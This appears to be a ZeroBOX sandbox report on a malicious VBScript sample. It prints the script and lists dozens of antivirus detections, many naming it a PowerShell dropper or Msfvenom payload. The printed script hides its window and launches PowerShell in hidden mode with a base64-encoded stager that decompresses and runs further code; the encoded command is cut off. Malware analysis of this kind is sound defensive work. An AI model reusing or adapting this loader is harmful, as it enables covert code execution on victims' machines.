popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<script language="VBScript">
window.moveTo -4000, -4000
Set m7MNLLiTjjw = CreateObject("Wscript.Shell")
Set y0vF = CreateObject("Scripting.FileSystemObject")
For each path in Split(m7MNLLiTjjw.ExpandEnvironmentStrings("%PSModulePath%"),";")
If y0vF.FileExists(path + "\..\powershell.exe") Then
m7MNLLiTjjw.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4A
Exit For
End If
Next
window.close()
</script>
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Agent.4!c
tehtris Clean
ClamAV Vbs.Backdoor.Msfvenom_Payload-9951533-0
CMC Clean
CAT-QuickHeal Script.Trojan.42447
Skyhigh BehavesLike.HTML.Dropper.zr
ALYac Trojan.Script.905440
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-VBS.Save.facd9283
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu VBS.Trojan-Downloader.Agent.va
VirIT Clean
Symantec VBS.Heur.SNIC
ESET-NOD32 VBS/Agent.NUI
TrendMicro-HouseCall Clean
Avast VBS:Obfuscated-GQ [Cryp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.VBS.Agent.gen
BitDefender Trojan.Script.905440
NANO-Antivirus Trojan.Html.Downloader.fqlyhy
ViRobot Clean
MicroWorld-eScan Trojan.Script.905440
Tencent Heur:Trojan.Powershell.Generic.d
Sophos Mal/PSDL-B
F-Secure Backdoor:HTML/PowerShellStager.A
DrWeb Clean
VIPRE Trojan.Script.905440
TrendMicro Clean
FireEye Trojan.Script.905440
Emsisoft Trojan.Script.905440 (B)
GData Trojan.Script.905440
Jiangmin Clean
Varist VBS/Agent.AXB!Eldorado
Avira VBS/PSRunner.VPA
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Win32.Infected.AutoInfector.a
Gridinsoft Trojan.U.Gen.tr
Xcitium TrojWare.VBS.Agent.NUI@8a4oj4
Arcabit Trojan.Script.DDD0E0
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.VBS.Agent.gen
Microsoft TrojanDropper:VBS/PSRunner.G!MSR
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee PS/Injector.d
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Yandex Clean
Ikarus Trojan.PowerShell.Agent
MaxSecure Clean
Fortinet VBS/Inject.B!tr
BitDefenderTheta Clean
AVG VBS:Obfuscated-GQ [Cryp]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.